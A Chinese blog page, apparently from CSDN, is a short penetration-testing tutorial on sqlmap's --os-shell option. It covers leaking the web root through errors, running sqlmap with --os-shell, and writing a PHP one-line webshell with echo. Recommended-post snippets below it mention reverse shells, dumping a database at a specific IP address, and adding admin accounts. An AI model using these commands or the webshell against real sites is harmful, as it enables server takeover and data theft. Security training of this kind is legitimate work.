sqlmap (--os-shell) 的使用

最新推荐文章于 2025-04-11 22:27:10 发布

主要是有趣

最新推荐文章于 2025-04-11 22:27:10 发布

阅读量355

点赞数

文章标签：网络安全

本文链接：https://blog.youkuaiyun.com/m0_55628907/article/details/132722059

版权

文章探讨了黑客如何通过抓包技术展示根路径、利用SQL注入执行os-shell命令以及构造一句话木马。具体案例展示了使用python的sqlmap工具和PHP代码实现这些攻击手段，强调了过滤条件在安全防护中的重要性。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1. 可通过抓包，输入不合法的字符让页面回显出根路径

如：c:\appserv\www\phptest2\db_func.php

我们需要猜测根目录是在 c:\appserv\www\phptest2\ 还是在 c:\appserv\www\

2. 检测注入点 ,并进行--os-shell

python sqlmap.py -r C:\Users\111.txt --os-shell

3.可通过 echo 来创建一句话木马（根据过滤条件自行构造）

如：echo "<?php eval($_REQUEST[a])?>" > c:\appserv\www\phptest2\ 111.php

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

主要是有趣

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

sqlmap 如何 --os-shell 及反弹shell_sqlmap跑shell

2301_77033340的博客

04-12

1179

厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新**

sqlmap mysql shell,sqlmap --os-shell执行原理（mysql篇）

weixin_34965737的博客

03-27

1516

sqlmap --os-shell执行原理对于mysql数据库来说，--os-shell的本质就是写入两个shell文件，其中的一个可以让我们用来执行命令，而另外一个，如果在网站访问的话，可以让我们可以上传文件。说到写入shell，就要说一下两个限制条件，首先，我们需要知道上传文件的两个限制条件，首先我们要知道网站的绝对路径(我们的shell写入到哪里)，然后要有导入导出的权限。导入导出的权限在m...

1 条评论您还未登录，请先登录后发表或查看评论

sqlmap --os-shell 使用方法

m0_50818626的博客

06-07

4870

可以看到最下方有文件上传的位置，在这里我们可以上传一句话木马。如上图所示，红框处很明显是一个传参点，我们就在这个页面抓包。总结：sqlmap -os-shell 的使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell：本质就是写入两个php文件。-dbms=mysql：指定跑mysql数据库。我们获得了两个url，我们访问第一个url。这里我们先选择4，因为网站是php代码写的。三、上传一句话木马，连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。

SqlMap参数及--os-shell原理思考

最新发布

2201_75556043的博客

04-11

1072

sqlmap参数合集整理

sqlmap 如何 --os-shell 及反弹shell

weixin_63580357的博客

10-17

1525

从上面结果可以看出已经成功反弹 shell，不过这个 shell 操作起来不甚顺畅，可以在 Kali 生成反弹 shell 代码，借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下，让我们命令执行，并将输出的内容返回sqlmap端。来说，--os-shell的本质就是写入两个php文件，其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php：指定生成的payload文件的名称为shell.php。

sqlmap （--os-shell）的使用

qq_50854662的博客

10-03

455

文章目录第一步搭建存在sql注入的网站第二步扫描注入点第三步选择网站的语言第四步输入网站的绝对路径第五步查看权限第一步搭建存在sql注入的网站第二步扫描注入点 python sqlmap.py -u "http://192.168.232.129/cms/show.php?id=33" --os-shell 第三步选择网站的语言第四步输入网站的绝对路径第五步查看权限 .

sqlmap的--os-shell

m0_71300782的博客

09-06

1147

一、首先对目标网站进行sqlmap扫描看看是否有sql漏洞。

sqlmap 如何 --os-shell 及反弹shell_sqlmap跑shell(4)

05-17

678

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。lport=4444：指定本地主机的端口号，也就是反向连接的目标主机的监听端口号。

sqlmap 如何 --os-shell 及反弹shell_sqlmap跑shell(3)

2401_84281594的博客

05-17

1196

sqlmap之--os-shell应用

weixin_50205723的博客

09-19

6612

一、找到网站注入点然后进入sqlmap进行攻击(学校靶机) sqlmap -u "http://117.167.136.244:28055/ajax.php?act=selgo" --data "tyid=1" -D faka -T ayangw_config --dump 二、输入sqlmap.py -u "http://117.167.136.244:28060/ajax.php?act=selKm" --data "gid=1" --is-dba判断是否具有数据库管理员权限确定具有后进行下一步操作

sqlmap之--os-shell

热门推荐

qq_45927819的博客

03-26

1万+

1、–os-shell原理使用udf提权获取webshell，也是通过into outfile向服务器写入两个文件，一个是可以直接执行系统命令，一个是进行上传文件。 –os-shell的执行条件： dbms为mysql，网站必须是root权限攻击者需要知道网站的绝对路径 magic_quotes_gpc = off，php主动转移功能关闭 2、环境介绍 phpstudy+sqlmap 3、探测网站根目录 python3 sqlmap.py -u "127.0.0.1/sqli-labs-master

sqlmap --os-shell选项原理解析

来日可期的博客

10-18

2528

sqlmap的--os-shell在mysql数据库中的原理，是往服务器上写入了两个php，其中一个提供了文件上传的页面，可以通过这个上传页面上传脚本文件到当前目录下。另外一个则是返回了可以让我们执行系统命令的命令行，命令行也可以在网页url中通过对cmd参数传参执行系统命令。

sqlmap —— os-shell参数分析

未完成的歌~的博客

10-07

4536

文章目录前言：一、os-shell执行原理二、测试环境：三、过程演示1、测试权限2、攻击3、选择语言4、输入绝对路径5、建立 os-shell 并执行命令四、原理分析总结：前言：最近在看sqlmap，发现--os-shell这个命令很厉害，所以来研究一下。一、os-shell执行原理对于 Mysql 数据库来说，--os-shell的本质就是写入两个 php 文件，其中的一个可以让我们用来执行命令，而另外一个可以让我们可以上传文件。说到写入文件，就要说一下上传文件的两个前提条件，首先我们要知道网站

sqlmap的getshell（os-shell、sql-shell）

2403_84483621的博客

03-20

293

在sqlmap-master文件夹页面打开cmd窗口报错需将mysql的my.ini配置文件改成secure_file_priv = ''其中引号里应该是空值而不是空格，再重启一下mysql。

sqlmap os-shell解析

weixin_50464560的博客

07-13

812

Background 最近遇到测试环境，最后利用sqlmap的–os-shell参数取得shell。一直以来，对这个参数的工作原理不是十分的清晰。大致的思想应该是将脚本插入到数据库中，然后生成相应的代码文件，获取shell即可执行命令 Environment 本环境是在局域网下利用两台主机搭建的，环境比较真实。攻击机：系统：windows7 工具：sqlmap 靶机：系统：windows7 环境：wamp搭建的apache、mysql和php 网页源码：phpmywind，此处修改了点源代码，方便进行

Kali渗透学习(2)——sqlmap使用--os-shell添加管理员

weixin_43669969的博客

02-19

1702

Kali渗透学习(2)——sqlmap使用–os-shell添加管理员首先要使用 --os-shell 来添加管理员用户，数据库要满足以下条件 1.你使用的数据库要有root权限 sqlmap -u “http://xxxx.xxx.xxx/xxx.php?id=x” --is-dbs 2GPC处于关闭状态即magic_quotes_gpc = off，php主动转义的功能关闭可以通过探...

sqlmap --os-shell教程

03-16

### 关于 `sqlmap` 使用 `--os-shell` 参数的教程 #### 工具概述 `sqlmap` 是一款功能强大的自动化 SQL 注入渗透测试工具，能够检测并利用多种类型的 SQL 注入漏洞。除了基本的数据提取外，它还支持高级操作，比如...

sqlmap (--os-shell) 的使用

1. 可通过抓包，输入不合法的字符让页面回显出根路径

2. 检测注入点 ,并进行--os-shell

3.可通过 echo 来创建一句话木马 （根据过滤条件自行构造）

3.可通过 echo 来创建一句话木马（根据过滤条件自行构造）